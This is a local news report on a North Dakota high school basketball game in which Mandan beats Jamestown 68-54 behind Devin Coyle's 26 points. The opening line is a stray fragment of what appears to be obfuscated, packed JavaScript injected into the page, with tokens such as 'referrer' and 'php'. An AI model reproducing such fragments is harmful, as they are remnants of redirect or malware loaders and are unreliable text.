MANDAN zanbe|var|u0026u|referrer|kbdft||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- The Gatorade North Dakota Football Player of the Year showed he isn’t a slouch on the basketball court Tuesday night against the Blue Jays.

Devin Coyle lead the Braves with 26 points as Mandan handed Jamestown their second consecutive loss, 68-54.

The Jays had won seven in-a-row before getting up-ended by Minot this past Saturday night.

Mandan jumped up on the Blue Jays 17-4 in the opening minutes and Jamestown was never able to close the gap.

Every time it seemed the Jays were close to pulling even, Coyle and company would come up with a big shot.

Danny Fischer led the Jays with 18 points. Dyllan Anderson had 14.

The result of Tuesday’s game made the records of Mandan and Jamestown exactly the same. They are both 8-4 overall and 6-3 in the WDA.

Jamestown will welcome the Bismarck High Demons to Jerry Meyer Arena on Saturday night.
